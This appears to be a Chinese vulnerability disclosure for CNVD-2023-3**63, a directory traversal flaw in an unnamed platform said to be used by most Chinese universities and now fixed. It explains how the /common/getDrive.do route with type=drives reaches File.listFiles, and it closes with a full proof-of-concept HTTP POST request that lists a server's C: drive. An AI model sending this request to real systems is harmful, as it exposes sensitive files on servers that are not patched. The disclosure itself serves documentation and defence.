CNVD-2023-3**63

某平台系统存在任意目录遍历漏洞，攻击者可利用该漏洞读取系统敏感信息，影响范围涉及全国大部分高校，现已修复。

漏洞分析

漏洞位于文件 WEB-INF/classes/com/fh/controller/common/Uploader.class

路由是 /common/getDrive.do

前面两个 if判断都是在 type 为 library 的时候进入，我们这里传入的是 type=drives ，直接进入到第三个 if语句；

调用 File.listFiles ，直接列出对应文件下的文件，然后放入到 map 中返回。

漏洞复现

POC

POST /common/getDrive.do HTTP/1.1
Host: 
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 36

path=C%3A%5C（可继续加路由）&type=drives&extensions=